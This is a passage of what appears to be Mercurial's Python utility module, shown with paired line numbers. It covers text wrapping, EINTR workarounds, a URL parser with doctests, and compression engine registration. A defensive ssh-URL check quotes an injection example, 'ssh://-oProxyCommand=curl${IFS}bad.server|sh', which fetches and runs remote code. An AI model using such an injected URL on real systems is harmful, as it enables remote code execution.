2516 2537 chunks.reverse()
2517 2538
2518 2539 while chunks:
2519 2540
2520 2541 # Start the list of chunks that will make up the current line.
2521 2542 # cur_len is just the length of all the chunks in cur_line.
2522 2543 cur_line = []
2523 2544 cur_len = 0
2524 2545
2525 2546 # Figure out which static string will prefix this line.
2526 2547 if lines:
2527 2548 indent = self.subsequent_indent
2528 2549 else:
2529 2550 indent = self.initial_indent
2530 2551
2531 2552 # Maximum width for this line.
2532 2553 width = self.width - len(indent)
2533 2554
2534 2555 # First chunk on line is whitespace -- drop it, unless this
2535 2556 # is the very beginning of the text (i.e. no lines started yet).
2536 2557 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2537 2558 del chunks[-1]
2538 2559
2539 2560 while chunks:
2540 2561 l = colwidth(chunks[-1])
2541 2562
2542 2563 # Can at least squeeze this chunk onto the current line.
2543 2564 if cur_len + l <= width:
2544 2565 cur_line.append(chunks.pop())
2545 2566 cur_len += l
2546 2567
2547 2568 # Nope, this line is full.
2548 2569 else:
2549 2570 break
2550 2571
2551 2572 # The current line is full, and the next chunk is too big to
2552 2573 # fit on *any* line (not just this one).
2553 2574 if chunks and colwidth(chunks[-1]) > width:
2554 2575 self._handle_long_word(chunks, cur_line, cur_len, width)
2555 2576
2556 2577 # If the last chunk on this line is all whitespace, drop it.
2557 2578 if (self.drop_whitespace and
2558 2579 cur_line and cur_line[-1].strip() == r''):
2559 2580 del cur_line[-1]
2560 2581
2561 2582 # Convert current line back to a string and store it in list
2562 2583 # of all lines (return value).
2563 2584 if cur_line:
2564 2585 lines.append(indent + r''.join(cur_line))
2565 2586
2566 2587 return lines
2567 2588
2568 2589 global MBTextWrapper
2569 2590 MBTextWrapper = tw
2570 2591 return tw(**kwargs)
2571 2592
2572 2593 def wrap(line, width, initindent='', hangindent=''):
2573 2594 maxindent = max(len(hangindent), len(initindent))
2574 2595 if width <= maxindent:
2575 2596 # adjust for weird terminal size
2576 2597 width = max(78, maxindent + 1)
2577 2598 line = line.decode(pycompat.sysstr(encoding.encoding),
2578 2599 pycompat.sysstr(encoding.encodingmode))
2579 2600 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2580 2601 pycompat.sysstr(encoding.encodingmode))
2581 2602 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2582 2603 pycompat.sysstr(encoding.encodingmode))
2583 2604 wrapper = MBTextWrapper(width=width,
2584 2605 initial_indent=initindent,
2585 2606 subsequent_indent=hangindent)
2586 2607 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2587 2608
2588 2609 if (pyplatform.python_implementation() == 'CPython' and
2589 2610 sys.version_info < (3, 0)):
2590 2611 # There is an issue in CPython that some IO methods do not handle EINTR
2591 2612 # correctly. The following table shows what CPython version (and functions)
2592 2613 # are affected (buggy: has the EINTR bug, okay: otherwise):
2593 2614 #
2594 2615 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2595 2616 # --------------------------------------------------
2596 2617 # fp.__iter__ | buggy | buggy | okay
2597 2618 # fp.read* | buggy | okay [1] | okay
2598 2619 #
2599 2620 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2600 2621 #
2601 2622 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2602 2623 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2603 2624 #
2604 2625 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2605 2626 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2606 2627 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2607 2628 # fp.__iter__ but not other fp.read* methods.
2608 2629 #
2609 2630 # On modern systems like Linux, the "read" syscall cannot be interrupted
2610 2631 # when reading "fast" files like on-disk files. So the EINTR issue only
2611 2632 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2612 2633 # files approximately as "fast" files and use the fast (unsafe) code path,
2613 2634 # to minimize the performance impact.
2614 2635 if sys.version_info >= (2, 7, 4):
2615 2636 # fp.readline deals with EINTR correctly, use it as a workaround.
2616 2637 def _safeiterfile(fp):
2617 2638 return iter(fp.readline, '')
2618 2639 else:
2619 2640 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2620 2641 # note: this may block longer than necessary because of bufsize.
2621 2642 def _safeiterfile(fp, bufsize=4096):
2622 2643 fd = fp.fileno()
2623 2644 line = ''
2624 2645 while True:
2625 2646 try:
2626 2647 buf = os.read(fd, bufsize)
2627 2648 except OSError as ex:
2628 2649 # os.read only raises EINTR before any data is read
2629 2650 if ex.errno == errno.EINTR:
2630 2651 continue
2631 2652 else:
2632 2653 raise
2633 2654 line += buf
2634 2655 if '\n' in buf:
2635 2656 splitted = line.splitlines(True)
2636 2657 line = ''
2637 2658 for l in splitted:
2638 2659 if l[-1] == '\n':
2639 2660 yield l
2640 2661 else:
2641 2662 line = l
2642 2663 if not buf:
2643 2664 break
2644 2665 if line:
2645 2666 yield line
2646 2667
2647 2668 def iterfile(fp):
2648 2669 fastpath = True
2649 2670 if type(fp) is file:
2650 2671 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2651 2672 if fastpath:
2652 2673 return fp
2653 2674 else:
2654 2675 return _safeiterfile(fp)
2655 2676 else:
2656 2677 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2657 2678 def iterfile(fp):
2658 2679 return fp
2659 2680
2660 2681 def iterlines(iterator):
2661 2682 for chunk in iterator:
2662 2683 for line in chunk.splitlines():
2663 2684 yield line
2664 2685
2665 2686 def expandpath(path):
2666 2687 return os.path.expanduser(os.path.expandvars(path))
2667 2688
2668 2689 def hgcmd():
2669 2690 """Return the command used to execute current hg
2670 2691
2671 2692 This is different from hgexecutable() because on Windows we want
2672 2693 to avoid things opening new shell windows like batch files, so we
2673 2694 get either the python call or current executable.
2674 2695 """
2675 2696 if mainfrozen():
2676 2697 if getattr(sys, 'frozen', None) == 'macosx_app':
2677 2698 # Env variable set by py2app
2678 2699 return [encoding.environ['EXECUTABLEPATH']]
2679 2700 else:
2680 2701 return [pycompat.sysexecutable]
2681 2702 return gethgcmd()
2682 2703
2683 2704 def rundetached(args, condfn):
2684 2705 """Execute the argument list in a detached process.
2685 2706
2686 2707 condfn is a callable which is called repeatedly and should return
2687 2708 True once the child process is known to have started successfully.
2688 2709 At this point, the child process PID is returned. If the child
2689 2710 process fails to start or finishes before condfn() evaluates to
2690 2711 True, return -1.
2691 2712 """
2692 2713 # Windows case is easier because the child process is either
2693 2714 # successfully starting and validating the condition or exiting
2694 2715 # on failure. We just poll on its PID. On Unix, if the child
2695 2716 # process fails to start, it will be left in a zombie state until
2696 2717 # the parent wait on it, which we cannot do since we expect a long
2697 2718 # running process on success. Instead we listen for SIGCHLD telling
2698 2719 # us our child process terminated.
2699 2720 terminated = set()
2700 2721 def handler(signum, frame):
2701 2722 terminated.add(os.wait())
2702 2723 prevhandler = None
2703 2724 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2704 2725 if SIGCHLD is not None:
2705 2726 prevhandler = signal.signal(SIGCHLD, handler)
2706 2727 try:
2707 2728 pid = spawndetached(args)
2708 2729 while not condfn():
2709 2730 if ((pid in terminated or not testpid(pid))
2710 2731 and not condfn()):
2711 2732 return -1
2712 2733 time.sleep(0.1)
2713 2734 return pid
2714 2735 finally:
2715 2736 if prevhandler is not None:
2716 2737 signal.signal(signal.SIGCHLD, prevhandler)
2717 2738
2718 2739 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2719 2740 """Return the result of interpolating items in the mapping into string s.
2720 2741
2721 2742 prefix is a single character string, or a two character string with
2722 2743 a backslash as the first character if the prefix needs to be escaped in
2723 2744 a regular expression.
2724 2745
2725 2746 fn is an optional function that will be applied to the replacement text
2726 2747 just before replacement.
2727 2748
2728 2749 escape_prefix is an optional flag that allows using doubled prefix for
2729 2750 its escaping.
2730 2751 """
2731 2752 fn = fn or (lambda s: s)
2732 2753 patterns = '|'.join(mapping.keys())
2733 2754 if escape_prefix:
2734 2755 patterns += '|' + prefix
2735 2756 if len(prefix) > 1:
2736 2757 prefix_char = prefix[1:]
2737 2758 else:
2738 2759 prefix_char = prefix
2739 2760 mapping[prefix_char] = prefix_char
2740 2761 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2741 2762 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2742 2763
2743 2764 def getport(port):
2744 2765 """Return the port for a given network service.
2745 2766
2746 2767 If port is an integer, it's returned as is. If it's a string, it's
2747 2768 looked up using socket.getservbyname(). If there's no matching
2748 2769 service, error.Abort is raised.
2749 2770 """
2750 2771 try:
2751 2772 return int(port)
2752 2773 except ValueError:
2753 2774 pass
2754 2775
2755 2776 try:
2756 2777 return socket.getservbyname(pycompat.sysstr(port))
2757 2778 except socket.error:
2758 2779 raise Abort(_("no port number associated with service '%s'") % port)
2759 2780
2760 2781 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2761 2782 '0': False, 'no': False, 'false': False, 'off': False,
2762 2783 'never': False}
2763 2784
2764 2785 def parsebool(s):
2765 2786 """Parse s into a boolean.
2766 2787
2767 2788 If s is not a valid boolean, returns None.
2768 2789 """
2769 2790 return _booleans.get(s.lower(), None)
2770 2791
2771 2792 _hextochr = dict((a + b, chr(int(a + b, 16)))
2772 2793 for a in string.hexdigits for b in string.hexdigits)
2773 2794
2774 2795 class url(object):
2775 2796 r"""Reliable URL parser.
2776 2797
2777 2798 This parses URLs and provides attributes for the following
2778 2799 components:
2779 2800
2780 2801 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2781 2802
2782 2803 Missing components are set to None. The only exception is
2783 2804 fragment, which is set to '' if present but empty.
2784 2805
2785 2806 If parsefragment is False, fragment is included in query. If
2786 2807 parsequery is False, query is included in path. If both are
2787 2808 False, both fragment and query are included in path.
2788 2809
2789 2810 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2790 2811
2791 2812 Note that for backward compatibility reasons, bundle URLs do not
2792 2813 take host names. That means 'bundle://../' has a path of '../'.
2793 2814
2794 2815 Examples:
2795 2816
2796 2817 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2797 2818 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2798 2819 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2799 2820 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2800 2821 >>> url(b'file:///home/joe/repo')
2801 2822 <url scheme: 'file', path: '/home/joe/repo'>
2802 2823 >>> url(b'file:///c:/temp/foo/')
2803 2824 <url scheme: 'file', path: 'c:/temp/foo/'>
2804 2825 >>> url(b'bundle:foo')
2805 2826 <url scheme: 'bundle', path: 'foo'>
2806 2827 >>> url(b'bundle://../foo')
2807 2828 <url scheme: 'bundle', path: '../foo'>
2808 2829 >>> url(br'c:\foo\bar')
2809 2830 <url path: 'c:\\foo\\bar'>
2810 2831 >>> url(br'\\blah\blah\blah')
2811 2832 <url path: '\\\\blah\\blah\\blah'>
2812 2833 >>> url(br'\\blah\blah\blah#baz')
2813 2834 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2814 2835 >>> url(br'file:///C:\users\me')
2815 2836 <url scheme: 'file', path: 'C:\\users\\me'>
2816 2837
2817 2838 Authentication credentials:
2818 2839
2819 2840 >>> url(b'ssh://joe:xyz@x/repo')
2820 2841 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2821 2842 >>> url(b'ssh://joe@x/repo')
2822 2843 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2823 2844
2824 2845 Query strings and fragments:
2825 2846
2826 2847 >>> url(b'http://host/a?b#c')
2827 2848 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2828 2849 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2829 2850 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2830 2851
2831 2852 Empty path:
2832 2853
2833 2854 >>> url(b'')
2834 2855 <url path: ''>
2835 2856 >>> url(b'#a')
2836 2857 <url path: '', fragment: 'a'>
2837 2858 >>> url(b'http://host/')
2838 2859 <url scheme: 'http', host: 'host', path: ''>
2839 2860 >>> url(b'http://host/#a')
2840 2861 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2841 2862
2842 2863 Only scheme:
2843 2864
2844 2865 >>> url(b'http:')
2845 2866 <url scheme: 'http'>
2846 2867 """
2847 2868
2848 2869 _safechars = "!~*'()+"
2849 2870 _safepchars = "/!~*'()+:\\"
2850 2871 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2851 2872
2852 2873 def __init__(self, path, parsequery=True, parsefragment=True):
2853 2874 # We slowly chomp away at path until we have only the path left
2854 2875 self.scheme = self.user = self.passwd = self.host = None
2855 2876 self.port = self.path = self.query = self.fragment = None
2856 2877 self._localpath = True
2857 2878 self._hostport = ''
2858 2879 self._origpath = path
2859 2880
2860 2881 if parsefragment and '#' in path:
2861 2882 path, self.fragment = path.split('#', 1)
2862 2883
2863 2884 # special case for Windows drive letters and UNC paths
2864 2885 if hasdriveletter(path) or path.startswith('\\\\'):
2865 2886 self.path = path
2866 2887 return
2867 2888
2868 2889 # For compatibility reasons, we can't handle bundle paths as
2869 2890 # normal URLS
2870 2891 if path.startswith('bundle:'):
2871 2892 self.scheme = 'bundle'
2872 2893 path = path[7:]
2873 2894 if path.startswith('//'):
2874 2895 path = path[2:]
2875 2896 self.path = path
2876 2897 return
2877 2898
2878 2899 if self._matchscheme(path):
2879 2900 parts = path.split(':', 1)
2880 2901 if parts[0]:
2881 2902 self.scheme, path = parts
2882 2903 self._localpath = False
2883 2904
2884 2905 if not path:
2885 2906 path = None
2886 2907 if self._localpath:
2887 2908 self.path = ''
2888 2909 return
2889 2910 else:
2890 2911 if self._localpath:
2891 2912 self.path = path
2892 2913 return
2893 2914
2894 2915 if parsequery and '?' in path:
2895 2916 path, self.query = path.split('?', 1)
2896 2917 if not path:
2897 2918 path = None
2898 2919 if not self.query:
2899 2920 self.query = None
2900 2921
2901 2922 # // is required to specify a host/authority
2902 2923 if path and path.startswith('//'):
2903 2924 parts = path[2:].split('/', 1)
2904 2925 if len(parts) > 1:
2905 2926 self.host, path = parts
2906 2927 else:
2907 2928 self.host = parts[0]
2908 2929 path = None
2909 2930 if not self.host:
2910 2931 self.host = None
2911 2932 # path of file:///d is /d
2912 2933 # path of file:///d:/ is d:/, not /d:/
2913 2934 if path and not hasdriveletter(path):
2914 2935 path = '/' + path
2915 2936
2916 2937 if self.host and '@' in self.host:
2917 2938 self.user, self.host = self.host.rsplit('@', 1)
2918 2939 if ':' in self.user:
2919 2940 self.user, self.passwd = self.user.split(':', 1)
2920 2941 if not self.host:
2921 2942 self.host = None
2922 2943
2923 2944 # Don't split on colons in IPv6 addresses without ports
2924 2945 if (self.host and ':' in self.host and
2925 2946 not (self.host.startswith('[') and self.host.endswith(']'))):
2926 2947 self._hostport = self.host
2927 2948 self.host, self.port = self.host.rsplit(':', 1)
2928 2949 if not self.host:
2929 2950 self.host = None
2930 2951
2931 2952 if (self.host and self.scheme == 'file' and
2932 2953 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2933 2954 raise Abort(_('file:// URLs can only refer to localhost'))
2934 2955
2935 2956 self.path = path
2936 2957
2937 2958 # leave the query string escaped
2938 2959 for a in ('user', 'passwd', 'host', 'port',
2939 2960 'path', 'fragment'):
2940 2961 v = getattr(self, a)
2941 2962 if v is not None:
2942 2963 setattr(self, a, urlreq.unquote(v))
2943 2964
2944 2965 @encoding.strmethod
2945 2966 def __repr__(self):
2946 2967 attrs = []
2947 2968 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2948 2969 'query', 'fragment'):
2949 2970 v = getattr(self, a)
2950 2971 if v is not None:
2951 2972 attrs.append('%s: %r' % (a, v))
2952 2973 return '<url %s>' % ', '.join(attrs)
2953 2974
2954 2975 def __bytes__(self):
2955 2976 r"""Join the URL's components back into a URL string.
2956 2977
2957 2978 Examples:
2958 2979
2959 2980 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2960 2981 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2961 2982 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2962 2983 'http://user:pw@host:80/?foo=bar&baz=42'
2963 2984 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2964 2985 'http://user:pw@host:80/?foo=bar%3dbaz'
2965 2986 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2966 2987 'ssh://user:pw@[::1]:2200//home/joe#'
2967 2988 >>> bytes(url(b'http://localhost:80//'))
2968 2989 'http://localhost:80//'
2969 2990 >>> bytes(url(b'http://localhost:80/'))
2970 2991 'http://localhost:80/'
2971 2992 >>> bytes(url(b'http://localhost:80'))
2972 2993 'http://localhost:80/'
2973 2994 >>> bytes(url(b'bundle:foo'))
2974 2995 'bundle:foo'
2975 2996 >>> bytes(url(b'bundle://../foo'))
2976 2997 'bundle:../foo'
2977 2998 >>> bytes(url(b'path'))
2978 2999 'path'
2979 3000 >>> bytes(url(b'file:///tmp/foo/bar'))
2980 3001 'file:///tmp/foo/bar'
2981 3002 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2982 3003 'file:///c:/tmp/foo/bar'
2983 3004 >>> print(url(br'bundle:foo\bar'))
2984 3005 bundle:foo\bar
2985 3006 >>> print(url(br'file:///D:\data\hg'))
2986 3007 file:///D:\data\hg
2987 3008 """
2988 3009 if self._localpath:
2989 3010 s = self.path
2990 3011 if self.scheme == 'bundle':
2991 3012 s = 'bundle:' + s
2992 3013 if self.fragment:
2993 3014 s += '#' + self.fragment
2994 3015 return s
2995 3016
2996 3017 s = self.scheme + ':'
2997 3018 if self.user or self.passwd or self.host:
2998 3019 s += '//'
2999 3020 elif self.scheme and (not self.path or self.path.startswith('/')
3000 3021 or hasdriveletter(self.path)):
3001 3022 s += '//'
3002 3023 if hasdriveletter(self.path):
3003 3024 s += '/'
3004 3025 if self.user:
3005 3026 s += urlreq.quote(self.user, safe=self._safechars)
3006 3027 if self.passwd:
3007 3028 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3008 3029 if self.user or self.passwd:
3009 3030 s += '@'
3010 3031 if self.host:
3011 3032 if not (self.host.startswith('[') and self.host.endswith(']')):
3012 3033 s += urlreq.quote(self.host)
3013 3034 else:
3014 3035 s += self.host
3015 3036 if self.port:
3016 3037 s += ':' + urlreq.quote(self.port)
3017 3038 if self.host:
3018 3039 s += '/'
3019 3040 if self.path:
3020 3041 # TODO: similar to the query string, we should not unescape the
3021 3042 # path when we store it, the path might contain '%2f' = '/',
3022 3043 # which we should *not* escape.
3023 3044 s += urlreq.quote(self.path, safe=self._safepchars)
3024 3045 if self.query:
3025 3046 # we store the query in escaped form.
3026 3047 s += '?' + self.query
3027 3048 if self.fragment is not None:
3028 3049 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3029 3050 return s
3030 3051
3031 3052 __str__ = encoding.strmethod(__bytes__)
3032 3053
3033 3054 def authinfo(self):
3034 3055 user, passwd = self.user, self.passwd
3035 3056 try:
3036 3057 self.user, self.passwd = None, None
3037 3058 s = bytes(self)
3038 3059 finally:
3039 3060 self.user, self.passwd = user, passwd
3040 3061 if not self.user:
3041 3062 return (s, None)
3042 3063 # authinfo[1] is passed to urllib2 password manager, and its
3043 3064 # URIs must not contain credentials. The host is passed in the
3044 3065 # URIs list because Python < 2.4.3 uses only that to search for
3045 3066 # a password.
3046 3067 return (s, (None, (s, self.host),
3047 3068 self.user, self.passwd or ''))
3048 3069
3049 3070 def isabs(self):
3050 3071 if self.scheme and self.scheme != 'file':
3051 3072 return True # remote URL
3052 3073 if hasdriveletter(self.path):
3053 3074 return True # absolute for our purposes - can't be joined()
3054 3075 if self.path.startswith(br'\\'):
3055 3076 return True # Windows UNC path
3056 3077 if self.path.startswith('/'):
3057 3078 return True # POSIX-style
3058 3079 return False
3059 3080
3060 3081 def localpath(self):
3061 3082 if self.scheme == 'file' or self.scheme == 'bundle':
3062 3083 path = self.path or '/'
3063 3084 # For Windows, we need to promote hosts containing drive
3064 3085 # letters to paths with drive letters.
3065 3086 if hasdriveletter(self._hostport):
3066 3087 path = self._hostport + '/' + self.path
3067 3088 elif (self.host is not None and self.path
3068 3089 and not hasdriveletter(path)):
3069 3090 path = '/' + path
3070 3091 return path
3071 3092 return self._origpath
3072 3093
3073 3094 def islocal(self):
3074 3095 '''whether localpath will return something that posixfile can open'''
3075 3096 return (not self.scheme or self.scheme == 'file'
3076 3097 or self.scheme == 'bundle')
3077 3098
3078 3099 def hasscheme(path):
3079 3100 return bool(url(path).scheme)
3080 3101
3081 3102 def hasdriveletter(path):
3082 3103 return path and path[1:2] == ':' and path[0:1].isalpha()
3083 3104
3084 3105 def urllocalpath(path):
3085 3106 return url(path, parsequery=False, parsefragment=False).localpath()
3086 3107
3087 3108 def checksafessh(path):
3088 3109 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3089 3110
3090 3111 This is a sanity check for ssh urls. ssh will parse the first item as
3091 3112 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3092 3113 Let's prevent these potentially exploited urls entirely and warn the
3093 3114 user.
3094 3115
3095 3116 Raises an error.Abort when the url is unsafe.
3096 3117 """
3097 3118 path = urlreq.unquote(path)
3098 3119 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3099 3120 raise error.Abort(_('potentially unsafe url: %r') %
3100 3121 (pycompat.bytestr(path),))
3101 3122
3102 3123 def hidepassword(u):
3103 3124 '''hide user credential in a url string'''
3104 3125 u = url(u)
3105 3126 if u.passwd:
3106 3127 u.passwd = '***'
3107 3128 return bytes(u)
3108 3129
3109 3130 def removeauth(u):
3110 3131 '''remove all authentication information from a url string'''
3111 3132 u = url(u)
3112 3133 u.user = u.passwd = None
3113 3134 return str(u)
3114 3135
3115 3136 timecount = unitcountfn(
3116 3137 (1, 1e3, _('%.0f s')),
3117 3138 (100, 1, _('%.1f s')),
3118 3139 (10, 1, _('%.2f s')),
3119 3140 (1, 1, _('%.3f s')),
3120 3141 (100, 0.001, _('%.1f ms')),
3121 3142 (10, 0.001, _('%.2f ms')),
3122 3143 (1, 0.001, _('%.3f ms')),
3123 3144 (100, 0.000001, _('%.1f us')),
3124 3145 (10, 0.000001, _('%.2f us')),
3125 3146 (1, 0.000001, _('%.3f us')),
3126 3147 (100, 0.000000001, _('%.1f ns')),
3127 3148 (10, 0.000000001, _('%.2f ns')),
3128 3149 (1, 0.000000001, _('%.3f ns')),
3129 3150 )
3130 3151
3131 3152 _timenesting = [0]
3132 3153
3133 3154 def timed(func):
3134 3155 '''Report the execution time of a function call to stderr.
3135 3156
3136 3157 During development, use as a decorator when you need to measure
3137 3158 the cost of a function, e.g. as follows:
3138 3159
3139 3160 @util.timed
3140 3161 def foo(a, b, c):
3141 3162 pass
3142 3163 '''
3143 3164
3144 3165 def wrapper(*args, **kwargs):
3145 3166 start = timer()
3146 3167 indent = 2
3147 3168 _timenesting[0] += indent
3148 3169 try:
3149 3170 return func(*args, **kwargs)
3150 3171 finally:
3151 3172 elapsed = timer() - start
3152 3173 _timenesting[0] -= indent
3153 3174 stderr.write('%s%s: %s\n' %
3154 3175 (' ' * _timenesting[0], func.__name__,
3155 3176 timecount(elapsed)))
3156 3177 return wrapper
3157 3178
3158 3179 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3159 3180 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3160 3181
3161 3182 def sizetoint(s):
3162 3183 '''Convert a space specifier to a byte count.
3163 3184
3164 3185 >>> sizetoint(b'30')
3165 3186 30
3166 3187 >>> sizetoint(b'2.2kb')
3167 3188 2252
3168 3189 >>> sizetoint(b'6M')
3169 3190 6291456
3170 3191 '''
3171 3192 t = s.strip().lower()
3172 3193 try:
3173 3194 for k, u in _sizeunits:
3174 3195 if t.endswith(k):
3175 3196 return int(float(t[:-len(k)]) * u)
3176 3197 return int(t)
3177 3198 except ValueError:
3178 3199 raise error.ParseError(_("couldn't parse size: %s") % s)
3179 3200
3180 3201 class hooks(object):
3181 3202 '''A collection of hook functions that can be used to extend a
3182 3203 function's behavior. Hooks are called in lexicographic order,
3183 3204 based on the names of their sources.'''
3184 3205
3185 3206 def __init__(self):
3186 3207 self._hooks = []
3187 3208
3188 3209 def add(self, source, hook):
3189 3210 self._hooks.append((source, hook))
3190 3211
3191 3212 def __call__(self, *args):
3192 3213 self._hooks.sort(key=lambda x: x[0])
3193 3214 results = []
3194 3215 for source, hook in self._hooks:
3195 3216 results.append(hook(*args))
3196 3217 return results
3197 3218
3198 3219 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3199 3220 '''Yields lines for a nicely formatted stacktrace.
3200 3221 Skips the 'skip' last entries, then return the last 'depth' entries.
3201 3222 Each file+linenumber is formatted according to fileline.
3202 3223 Each line is formatted according to line.
3203 3224 If line is None, it yields:
3204 3225 length of longest filepath+line number,
3205 3226 filepath+linenumber,
3206 3227 function
3207 3228
3208 3229 Not be used in production code but very convenient while developing.
3209 3230 '''
3210 3231 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3211 3232 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3212 3233 ][-depth:]
3213 3234 if entries:
3214 3235 fnmax = max(len(entry[0]) for entry in entries)
3215 3236 for fnln, func in entries:
3216 3237 if line is None:
3217 3238 yield (fnmax, fnln, func)
3218 3239 else:
3219 3240 yield line % (fnmax, fnln, func)
3220 3241
3221 3242 def debugstacktrace(msg='stacktrace', skip=0,
3222 3243 f=stderr, otherf=stdout, depth=0):
3223 3244 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3224 3245 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3225 3246 By default it will flush stdout first.
3226 3247 It can be used everywhere and intentionally does not require an ui object.
3227 3248 Not be used in production code but very convenient while developing.
3228 3249 '''
3229 3250 if otherf:
3230 3251 otherf.flush()
3231 3252 f.write('%s at:\n' % msg.rstrip())
3232 3253 for line in getstackframes(skip + 1, depth=depth):
3233 3254 f.write(line)
3234 3255 f.flush()
3235 3256
3236 3257 class dirs(object):
3237 3258 '''a multiset of directory names from a dirstate or manifest'''
3238 3259
3239 3260 def __init__(self, map, skip=None):
3240 3261 self._dirs = {}
3241 3262 addpath = self.addpath
3242 3263 if safehasattr(map, 'iteritems') and skip is not None:
3243 3264 for f, s in map.iteritems():
3244 3265 if s[0] != skip:
3245 3266 addpath(f)
3246 3267 else:
3247 3268 for f in map:
3248 3269 addpath(f)
3249 3270
3250 3271 def addpath(self, path):
3251 3272 dirs = self._dirs
3252 3273 for base in finddirs(path):
3253 3274 if base in dirs:
3254 3275 dirs[base] += 1
3255 3276 return
3256 3277 dirs[base] = 1
3257 3278
3258 3279 def delpath(self, path):
3259 3280 dirs = self._dirs
3260 3281 for base in finddirs(path):
3261 3282 if dirs[base] > 1:
3262 3283 dirs[base] -= 1
3263 3284 return
3264 3285 del dirs[base]
3265 3286
3266 3287 def __iter__(self):
3267 3288 return iter(self._dirs)
3268 3289
3269 3290 def __contains__(self, d):
3270 3291 return d in self._dirs
3271 3292
3272 3293 if safehasattr(parsers, 'dirs'):
3273 3294 dirs = parsers.dirs
3274 3295
3275 3296 def finddirs(path):
3276 3297 pos = path.rfind('/')
3277 3298 while pos != -1:
3278 3299 yield path[:pos]
3279 3300 pos = path.rfind('/', 0, pos)
3280 3301
3281 3302 # compression code
3282 3303
3283 3304 SERVERROLE = 'server'
3284 3305 CLIENTROLE = 'client'
3285 3306
3286 3307 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3287 3308 (u'name', u'serverpriority',
3288 3309 u'clientpriority'))
3289 3310
3290 3311 class compressormanager(object):
3291 3312 """Holds registrations of various compression engines.
3292 3313
3293 3314 This class essentially abstracts the differences between compression
3294 3315 engines to allow new compression formats to be added easily, possibly from
3295 3316 extensions.
3296 3317
3297 3318 Compressors are registered against the global instance by calling its
3298 3319 ``register()`` method.
3299 3320 """
3300 3321 def __init__(self):
3301 3322 self._engines = {}
3302 3323 # Bundle spec human name to engine name.
3303 3324 self._bundlenames = {}
3304 3325 # Internal bundle identifier to engine name.
3305 3326 self._bundletypes = {}
3306 3327 # Revlog header to engine name.
3307 3328 self._revlogheaders = {}
3308 3329 # Wire proto identifier to engine name.
3309 3330 self._wiretypes = {}
3310 3331
3311 3332 def __getitem__(self, key):
3312 3333 return self._engines[key]
3313 3334
3314 3335 def __contains__(self, key):
3315 3336 return key in self._engines
3316 3337
3317 3338 def __iter__(self):
3318 3339 return iter(self._engines.keys())
3319 3340
3320 3341 def register(self, engine):
3321 3342 """Register a compression engine with the manager.
3322 3343
3323 3344 The argument must be a ``compressionengine`` instance.
3324 3345 """
3325 3346 if not isinstance(engine, compressionengine):
3326 3347 raise ValueError(_('argument must be a compressionengine'))
3327 3348
3328 3349 name = engine.name()
3329 3350
3330 3351 if name in self._engines:
3331 3352 raise error.Abort(_('compression engine %s already registered') %
3332 3353 name)
3333 3354
3334 3355 bundleinfo = engine.bundletype()
3335 3356 if bundleinfo:
3336 3357 bundlename, bundletype = bundleinfo
3337 3358
3338 3359 if bundlename in self._bundlenames:
3339 3360 raise error.Abort(_('bundle name %s already registered') %
3340 3361 bundlename)
3341 3362 if bundletype in self._bundletypes:
3342 3363 raise error.Abort(_('bundle type %s already registered by %s') %
3343 3364 (bundletype, self._bundletypes[bundletype]))
3344 3365
